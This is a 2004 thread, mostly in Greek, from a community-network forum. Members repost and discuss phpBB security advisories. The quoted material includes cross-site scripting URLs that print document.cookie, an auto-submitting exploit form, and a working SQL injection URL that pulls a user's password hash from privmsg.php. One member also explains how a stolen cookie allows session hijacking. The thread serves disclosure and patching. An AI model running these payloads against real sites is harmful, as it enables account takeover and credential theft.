# Software > Ασφάλεια >  PhpBB

## Mick Flemm

http://www.awmn.gr/forum/viewtopic.php? ... 0%74%3E%3C

περισσότερες πληροφορίες..


################################################
Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability
Release Date: Feb 29,2004 
Application: phpBB 
Platform: PHP
Version Affected: the lastest version
Vendor URL: http://www.phpbb.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
################################################

Details:
This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code could be used to steal cookie information.

Proof of Concept:
If there is a topic at 
http://site/phpBB/viewtopic.php?t=123456
this page can be also viewed at
http://site/phpBB/viewtopic.php?t=123456&postorder=asc
then this page will contain code like below:
[Topic Title].
phpBB doesn't filter out illegal characters from 'postorder',so we can inject HTML code after 'postorder='.

----------


## paravoid

Μικρής σημασίας bug...
Γενικά τα XSS δεν είναι να τους δίνεις πολύ σημασία...
Όχι πες μου εσύ θα πήγαινες σε ένα τέτοιο link αν στο έδινε άτομο που δεν ξέρεις;  :: 

Θα το έφτιαχνα αλλά το phpBB Team δεν έχει βγάλει fix ακόμα και δεν έχω καμμία όρεξη να patchάρω μόνος μου...

----------


## Achille

Καλό είναι να το φτιάξουμε (κράτα σε ένα diff τις διαφορές για να μπορέσεις να περάσεις το επίσημο patch).

Στο url με τα καταπληκτικά patches όμως, μπορεί να πήγαινε κάποιος  ::

----------


## Mick Flemm

Άλλο ένα ΧSS και πάλι sorry για το μεγάλο post αλλά δεν έχει URL...

Vendor : phpBB Group
URL : http://www.phpbb.com
Version : phpBB 2.0.6d && Earlier
Risk : Cross Site Scripting

Problem:
phpBB is a great forum system used by many millions of people. It is one of 
the more secure of the forum systems, but has a few issues still present; both 
of which allow for XSS (Cross Site Scripting). This problem presents itself in 
two different places.One of these places is viewtopic.php and the other is 
viewforum.php Below are examples along with a brief explanation on how to 
replicate this issue.

viewforum.php?f=[FNUM]&topicdays=[DNUM][XSS]

FNUM is a valid forum number. DNUM is the number of days to check. If you get no 
results with the number 1 for example try the number 99 and so forth and so on. 
XSS is whatever code is injected.

viewtopic.php?t=[TNUM]&postdays=[DNUM][XSS]

This is nearly the same issue as above, it just happens to be present in multiple 
files. The only difference is TNUM is a valid topic id number. Remember, the query 
must display results in order for the XSS to take place. Additionally the offset 
(start) variable may be used to get results, but in most cases is unnecessary. 
Examples are below though.


Examples:
viewforum.php?f=1&topicdays=99"><script>alert(document.cookie)</script>&start=30
viewtopic.php?t=10&postdays=99"><script>alert(document.cookie)</script>&start=20


Solution:
I have released a fix for this vulnerability. It requires a valid integer for the
affected variables, and thus eliminates this vulnerability from taking place. You
can find the fix by following the link below.

http://www.gulftech.org/vuln/phpBB2.0.6dfix.rar

...
.
.
phpBB development team will be releasing an official fix soon. Please check their 
website, or the SourceForge projects page of phpBB for any updates. The SourceForge 
projects page for phpBB can be located @ http://sourceforge.net/projects/phpbb The 
fix supplied here should suffice though. If you feel this is incorrect please contact 
me with details of any problems you experience. And a big thanks to Meik Sievertsen 
and the rest of the phpBB team for addressing these issues in a very prompt and 
professional manner. Original advisory located @ http://www.gulftech.org/03122004.php



Credits:
Credits go to JeiAr of the GulfTech Security Research Team. 
http://www.gulftech.org

----------


## jimis

Αυτό για το τελευταίο

Ετσι για να πω κάτι κι εγώ  :: 

Για το πρώτο, το patchάρατε; Γιατί δε μου δουλεύει. 

Και μια ερώτηση (μη βαράτε - άσχετος είμαι): πως μπορεί κάποιος να τα εκμεταλευτεί με κακό σκοπό αυτά; Γιατί το να βλέπεις τα cookies σου είναι αρκετά αθώο  :: 

Δημήτρης

Υ.Γ. Μου βγήκε το λάδι να βάλω αυτό το εισαγωγικό στο link

----------


## Mick Flemm

Να ανοίξει το Link όταν δεν θα βλέπεις και να δει το cookie σου, μετά μπορεί να το πετάξει όπως είναι στον Mozilla ή τον IE και απλά να μπει στη σελίδα ως εσύ  ::  ...

----------


## Mick Flemm

Αυτό φαίνεται ποιό σοβαρό....

http://www.gulftech.org/03202004.php

----------


## Mick Flemm

#####################################################################

Advisory Name : phpBB profile.php Cross Site Scripting Vulnerability
Release Date : Mar 21,2004 
Application : phpBB
Version : phpBB 2.0.6d or others?
Platform : PHP
Vendor URL : http://www.phpbb.com/
Author : Cheng Peng Su(apple_soup_at_msn.com)

#####################################################################

Proof of Conecpt:

This vuln is in profile.php,when you click [Show Gallery],phpBB 
will show you Avatar gallery,asking you to choose one for yourself.
The hole is in the form,after submitting phpBB will use the value of 
"avatarselect" as the path of the gallery directly,without filtering
any illegal characters.

Exploit:

-------------exploit.htm--------------
<form name='f' action="http://site/profile.php?mode=editprofile" method="post">
<input name="avatarselect" value='" >&lt;script&gt;alert(document.cookie)&lt;/script&gt;'>
<input type="submit" name="submitavatar" value="Select avatar">
</form>
&lt;script&gt;
window.onload=function()
{
document.all.submitavatar.click();
}
&lt;/script&gt;
---------------end-------------------

Contact:

Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China(430072)
apple_soup_at_msn.com

----------


## paravoid

Thanx αλλά http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=183098
Όσο για το 2.0.7 και το 2.0.7a μην ανησυχείς, περασμένα όλα  :: 
Δεν με προλαβαίνεις  ::

----------


## Mick Flemm

Hey,

The below patch fixes the sql injection vulnerability
reported by Janek Vind "waraxe", in privmsg.php.


Also available from:
http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch

It should be noted that, as Janek stated, this serious
SQL injection vulnerability exists in ALL versions of
phpBB2 - even the latest.

The patch is written for the latest version of phpBB2,
2.0.8, and it prevents the issue successfully.



Thank you for your time.
Shaun.

----------


## Mick Flemm

Hi guys,

After playing around with the private message SQL injection issue on a forum that I admin I noticed that the exploit code posted in the authors post doesn't work correctly. Here is why:

Both the TO and FROM fields hold the username and md5 hash in his exploit. The problem is each field only is able to hold 25 bytes at most (at least on the forums I tested it, they were all 2.0. :: . Well, MD5 hash is 32 bytes, so you may get what looks like a valid hash @ first glance, but it doesn't work as it is an incomplete hash. Below is an example that stores the username in the SUBJECT of the PM and the MD5 hash in the BODY of the PM. It was tested on a few versions with working results. Of course the user_id=2 can be replaced with whatever user_id someone wants.

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

Hope this helps  :: 

JeiAr

----------

